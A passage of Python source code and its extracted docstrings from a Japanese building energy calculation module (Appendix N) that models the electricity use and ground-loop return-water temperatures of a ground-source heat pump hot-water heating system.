付録Hに定める温水暖房用熱源機の最大能力 q_max_hs に等しい return appendix_H.calc_q_max_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh) def get_f_crated(): """地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) Args: Returns: float: 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) """ return 1.35 # ============================================================================ # N.11 地中熱交換器からの戻り熱源水の日平均温度 # ============================================================================ def get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, Delta_Theta_gsRW_H): """日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17) Args: K_gsRW_H(float): K_gsRW_H: 地中熱交換器からの戻り熱源水温度を求める式の係数(-) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_ex_a_Ave(float): 年平均外気温度 (℃) Delta_Theta_gsRW_H(float): 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃) Returns: ndarray: 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) """ # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17) Theta_gsRW_d_ave_d = K_gsRW_H * (Theta_ex_d_Ave_d - Theta_ex_H_Ave) + Theta_ex_a_Ave + Delta_Theta_gsRW_H return Theta_gsRW_d_ave_d def calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType): """暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Args: R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-) HeatExchangerType(str): 地中熱交換器タイプ Returns: float: 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃) """ # 熱交換器タイプに応じた係数取得 a_gsRW_H = get_a_gsRW_H(HeatExchangerType) b_gsRW_H = get_b_gsRW_H(HeatExchangerType) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Delta_Theta_gsRW_H = a_gsRW_H * R_L_max + b_gsRW_H return Delta_Theta_gsRW_H def calc_K_gsRW_H(R_L_max, HeatExchangerType): """地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) Args: R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-) HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) """ # 熱交換器タイプに応じた係数取得 c_gsRW_H = get_c_gsRW_H(HeatExchangerType) d_gsRW_H = get_d_gsRW_H(HeatExchangerType) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) K_gsRW_H = c_gsRW_H * R_L_max + d_gsRW_H return K_gsRW_H def get_a_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数a_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数a_gsRW_Hの取得 """ if HeatExchangerType == '1': return get_table_n_3()[0][0] elif HeatExchangerType == '2': return get_table_n_3()[1][0] elif HeatExchangerType == '3': return get_table_n_3()[2][0] elif HeatExchangerType == '4': return get_table_n_3()[3][0] elif HeatExchangerType == '5': return get_table_n_3()[4][0] else: raise ValueError(HeatExchangerType) def get_b_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数b_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数b_gsRW_Hの取得 """ if HeatExchangerType == '1': return get_table_n_3()[0][1] elif HeatExchangerType == '2': return get_table_n_3()[1][1] elif HeatExchangerType == '3': return get_table_n_3()[2][1] elif HeatExchangerType == '4': return get_table_n_3()[3][1] elif HeatExchangerType == '5': return get_table_n_3()[4][1] else: raise ValueError(HeatExchangerType) def get_c_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数a_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数a_gsRW_Hの取得 """ if HeatExchangerType == '1': return get_table_n_3()[0][2] elif HeatExchangerType == '2': return get_table_n_3()[1][2] elif HeatExchangerType == '3': return get_table_n_3()[2][2] elif HeatExchangerType == '4': return get_table_n_3()[3][2] elif HeatExchangerType == '5': return get_table_n_3()[4][2] else: raise ValueError(HeatExchangerType) def get_d_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数b_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数b_gsRW_Hの取得 """ if HeatExchangerType == '1': return get_table_n_3()[0][3] elif HeatExchangerType == '2': return get_table_n_3()[1][3] elif HeatExchangerType == '3': return get_table_n_3()[2][3] elif HeatExchangerType == '4': return get_table_n_3()[3][3] elif HeatExchangerType == '5': return get_table_n_3()[4][3] else: raise ValueError(HeatExchangerType) def get_table_n_3(): """表N.3 係数 Args: Returns: list: 表N.3 係数 """ table_n_3 = [ (3.1672, -0.4273, -0.0444, 0.0442), (5.9793, -1.0687, -0.1613, 0.1047), (8.3652, -1.5946, -0.2486, 0.1546), (9.9065, -2.1827, -0.3454, 0.2072), (10.2898, -2.8727, -0.3270, 0.2700) ] return table_n_3 def get_R_L_max(L_max_H, L_max_C): """1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) Args: L_max_H(float): 1日当たりの暖房負荷の年間最大値(MJ/d) L_max_C(float): 1日当たりの冷房全熱負荷の年間最大値(MJ/d) Returns: float: 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) """ # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) R_L_max = (L_max_C - L_max_H) / (L_max_C + L_max_H) return R_L_max def get_L_max_H(L_H_x_t_i): """1日当たりの暖房負荷の年間最大値(MJ/d)(20b) Args: L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 Returns: float: 1日当たりの暖房負荷の年間最大値(MJ/d) """ # L_H_x_t_iは暖冷房区画毎に365日×24時間分の負荷を持った2次元配列 # 暖冷房区画軸合算(暖冷房区画の次元をなくす) L_H_x_t = np.sum(L_H_x_t_i, axis=0) # 1次元配列を2次元配列に形状変換する L_H_x_t = np.reshape(L_H_x_t, (365, 24)) # 時間軸合算 L_H_x = np.sum(L_H_x_t, axis=1) # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) L_max_H = np.max(L_H_x) return L_max_H def get_L_max_C(L_CS_x_t_i, L_CL_x_t_i): """1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) Args: L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) Returns: float: 1日当たりの冷房全熱負荷の年間最大値(MJ/d) """ # 暖冷房区画軸合算(暖冷房区画の次元をなくす) L_CS_x_t = np.sum(L_CS_x_t_i, axis=0) L_CL_x_t = np.sum(L_CL_x_t_i, axis=0) # L_CS_x_tとL_CL_x_tの要素同士を足す L_C_x_t = L_CS_x_t + L_CL_x_t # 1次元配列を2次元配列に形状変換する L_C_x_t = np.reshape(L_C_x_t, (365, 24)) # 時間軸合算 L_C_x = np.sum(L_C_x_t, axis=1) # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) L_max_C = np.max(L_C_x) return L_max_C
ja
0.920386
# ============================================================================ # 付録 N 地中熱ヒートポンプ温水暖房機 # ============================================================================ # ============================================================================ # N3. 暖房エネルギー消費量 # ============================================================================ # ============================================================================ # N.3.1 消費電力量 # ============================================================================ 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の消費電力量 (1) Args: Q_dmd_H_hs_d_t(ndarray): 1時間当たりの熱源機の熱需要 (MJ/h) Theta_ex_a_Ave(float): 年平均外気温度 (℃) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_SW_d_t(ndarray): 往き温水温度 (℃) q_max_hs(float): 熱源機の最大暖房能力 ⒲ L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) HeatExchangerType(str): 熱交換器タイプ (-) Returns: ndarray: 1時間当たりの熱源機の消費電力量 (kWh/h) # ---------- 地中熱交換器からの戻り熱源水の日平均温度 ---------- # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17) # ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力 ---------- # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(16) # ---------- 温水暖房用熱源機内の平均放熱損失 ---------- # 日付dの時刻tにおける温水暖房用の熱源機内部の平均放熱損失 (kw) (N.9) # ---------- 温水暖房用熱源機の平均暖房出力 ---------- # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15) # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14) # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13) # ---------- 温水暖房用熱源機の最大暖房能力に対する平均負荷率 ---------- # 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) # ---------- 補機の消費電力量 ---------- # 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a) # ---------- ポンプの消費電力量 ---------- # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量 (kWh/h) (10a) # 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量 (kWh/h) (9a) # 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (kWh/h) (8) # ---------- 圧縮機の消費電力量 ---------- # 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(7a) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)(6a) # 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)(4a) # 日付dの時刻tにおける1時間当たりの圧縮機の圧縮効率 (-) (3a) # 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (kWh/h) (2) # ---------- 熱源機の消費電力量 ---------- # 1時間当たりの熱源機の消費電力量 (kWh/h) (1) # ============================================================================ # N.3.2 ガス消費量 # ============================================================================ 熱源機のガス消費量 Args: Returns: ndarray: 熱源機のガス消費量 # ============================================================================ # N.3.3 灯油消費量 # ============================================================================ 熱源機の灯油消費量 Args: Returns: ndarray: 熱源機の灯油消費量 # ============================================================================ # N.3.4 その他の一次エネルギー消費量 # ============================================================================ 熱源機のその他の燃料の一次エネルギー消費量 Args: Returns: ndarray: 熱源機のその他の燃料の一次エネルギー消費量 # ============================================================================ # N.4 圧縮機の消費電力量 # ============================================================================ 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) q_out_H_hs_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 q_loss_H_hs_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Mu_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_evp_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_cnd_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Returns: ndarray: 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 # 圧縮機の消費電力に対する補正係数を計算する式の係数(-) (2c) # 日付𝑑の時刻𝑡における圧縮機の消費電力に対する補正係数(-) (2b) # 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2a) 日付dの時刻tにおける圧縮機の圧縮効率 (3a) Args: Theta_ref_evp_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_cnd_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_SC_d_t(ndarray): ヒートポンプサイクルの過冷却度(℃) Theta_ref_SH_d_t(ndarray): ヒートポンプサイクルの過熱度(℃) Returns: ndarray: 日付dの時刻tにおける圧縮機の圧縮効率 (3a) # Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) # Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) # Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) # 日付dの時刻tにおけるヒートポンプサイクルの理論暖房効率(-) 4章8節付録A(1) # 日付dの時刻tにおける圧縮機の圧縮効率 (3a) Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) Returns: 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) # Kevph0:蒸発温度を計算する式の係数 (-) (4b) # Kevph1:蒸発温度を計算する式の係数 (-) (4b) # Kevph2:蒸発温度を計算する式の係数 (-) (4b) # Kevph12:蒸発温度を計算する式の係数 (-) (4b) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) Kevph0:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph0:蒸発温度を計算する式の係数 Kevph1:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph1:蒸発温度を計算する式の係数 Kevph2:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph2:蒸発温度を計算する式の係数 Kevph12:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph12:蒸発温度を計算する式の係数 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a) Args: qr_out_H_hs_d_t(param Theta_SW_d_t: 日付dの時刻tにおける往き温水温度(℃)): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_SW_d_t(ndarray): 日付dの時刻tにおける往き温水温度(℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃) # Kcndh0:凝縮温度を計算する式の係数 (-) (5b) # Kcndh1:凝縮温度を計算する式の係数 (-) (5b) # Kcndh2:凝縮温度を計算する式の係数 (-) (5b) # Kcndh12:凝縮温度を計算する式の係数 (-) (5b) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (5a) Kcndh0:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh0:凝縮温度を計算する式の係数 Kcndh1:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh1:凝縮温度を計算する式の係数 Kcndh2:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh2:凝縮温度を計算する式の係数 Kcndh12:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: ndarray: Kcndh12:凝縮温度を計算する式の係数 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃)(6a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_SW_d_t(ndarray): 往き温水温度 (℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃) # Ksch0:過冷却度を計算する式の係数 (-) (6b) # Ksch1:過冷却度を計算する式の係数 (-) (6b) # Ksch2:過冷却度を計算する式の係数 (-) (6b) # 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃) (6a) Ksch0:過冷却度を計算する式の係数(-) (6b) Args: Returns: float: Ksch0:過冷却度を計算する式の係数(-) (6b) Ksch1:過冷却度を計算する式の係数 (-) (6b) Args: Returns: float: Ksch1:過冷却度を計算する式の係数 Ksch2:過冷却度を計算する式の係数 (-) (6b) Args: Returns: float: Ksch2:過冷却度を計算する式の係数 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃)(7a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃) # Kshh0:過熱度を計算する式の係数 (-) (7b) # Kshh1:過熱度を計算する式の係数 (-) (7b) # Kshh2:過熱度を計算する式の係数 (-) (7b) # 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃) (7a) Kshh0:過熱度を計算する式の係数(-) (7b) Args: Returns: float: Kshh0:過熱度を計算する式の係数 Kshh1:過熱度を計算する式の係数 (-) (7b) Args: Returns: float: Kshh1:過熱度を計算する式の係数 (-) Kshh2:過熱度を計算する式の係数 (-) (7b) Args: Returns: Kshh2:過熱度を計算する式の係数 (-) # ============================================================================ # N.5 ポンプの消費電力量 # ============================================================================ 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8) Args: E_pump_SW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) E_pump_gsRW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) Returns: ndarray: 日付dの時刻tにおける1時間当たりのポンプの消費電力量(kWh/h) # 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8) 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) # apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) # bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) # 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a) apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) Args: Returns: float: apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) Args: Returns: float: bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) # apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) # bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a) apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) Args: Returns: float: apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) Args: Returns: bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) # ============================================================================ # N.6 補機の消費電力量 # ============================================================================ 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) # kauxh0:補機の消費電力量を計算する式の係数 (-) (11b) # kauxh1:補機の消費電力量を計算する式の係数 (-) (11b) # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (11a) kauxh0:補機の消費電力量を計算する式の係数 (-) (11b) Args: Returns: float: kauxh0:補機の消費電力量を計算する式の係数 (-) kauxh1:補機の消費電力量を計算する式の係数 (-) (11b) Args: Returns: float: kauxh1:補機の消費電力量を計算する式の係数 (-) # ============================================================================ # N.7 温水暖房用熱源機の最大暖房能力に対する平均負荷率 # ============================================================================ 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) Args: q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) q_max_H_hs_JRA(ndarray): 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) Returns: ndarray: 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) # 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) # ============================================================================ # N.8 温水暖房用熱源機の平均暖房出力 # ============================================================================ 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13) Args: Q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h) Returns: ndarray: 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)(13) 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14) Args: Q_dmd_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の温水熱需要(MJ/h) Q_max_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) Returns: ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h) # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)(14) 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) (15) Args: Theta_SW_d_t(ndarray): 往き温水温度 (℃) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_ex_a_Ave(float): 年平均外気温度 (℃) q_max_hs(float): 熱源機の最大暖房能力 ⒲ L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) HeatExchangerType(str): 熱交換器タイプ (-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) # ---------- 地中熱交換器からの戻り熱源水の日平均温度 ---------- # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17) # ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16) ---------- # ---------- 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15) ---------- # ============================================================================ # N.9 温水暖房用熱源機内の平均放熱損失 # ============================================================================ 日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW) Args: Returns: float: 日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW) # ============================================================================ # N.10 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力 # ============================================================================ 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16) Args: q_max_hs(return: 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)): 熱源機の最大暖房能力 ⒲ Returns: 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) # 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) # 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)(16) 温水暖房用熱源機の定格能力 Args: region(int): 省エネルギー地域区分 A_A(float): 床面積の合計 (m2) A_MR(float): 主たる居室の床面積 (m2) A_OR(float): その他の居室の床面積 (m2) mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は' mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は' has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue Returns: float: 温水暖房用熱源機の定格能力 # 付録Hに定める温水暖房用熱源機の最大能力 q_max_hs に等しい 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) Args: Returns: float: 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) # ============================================================================ # N.11 地中熱交換器からの戻り熱源水の日平均温度 # ============================================================================ 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17) Args: K_gsRW_H(float): K_gsRW_H: 地中熱交換器からの戻り熱源水温度を求める式の係数(-) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_ex_a_Ave(float): 年平均外気温度 (℃) Delta_Theta_gsRW_H(float): 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃) Returns: ndarray: 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17) 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Args: R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-) HeatExchangerType(str): 地中熱交換器タイプ Returns: float: 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃) # 熱交換器タイプに応じた係数取得 # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) Args: R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-) HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) # 熱交換器タイプに応じた係数取得 # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) 熱交換器タイプに応じた係数a_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数a_gsRW_Hの取得 熱交換器タイプに応じた係数b_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数b_gsRW_Hの取得 熱交換器タイプに応じた係数a_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数a_gsRW_Hの取得 熱交換器タイプに応じた係数b_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数b_gsRW_Hの取得 表N.3 係数 Args: Returns: list: 表N.3 係数 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) Args: L_max_H(float): 1日当たりの暖房負荷の年間最大値(MJ/d) L_max_C(float): 1日当たりの冷房全熱負荷の年間最大値(MJ/d) Returns: float: 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) Args: L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 Returns: float: 1日当たりの暖房負荷の年間最大値(MJ/d) # L_H_x_t_iは暖冷房区画毎に365日×24時間分の負荷を持った2次元配列 # 暖冷房区画軸合算(暖冷房区画の次元をなくす) # 1次元配列を2次元配列に形状変換する # 時間軸合算 # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) Args: L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) Returns: float: 1日当たりの冷房全熱負荷の年間最大値(MJ/d) # 暖冷房区画軸合算(暖冷房区画の次元をなくす) # L_CS_x_tとL_CL_x_tの要素同士を足す # 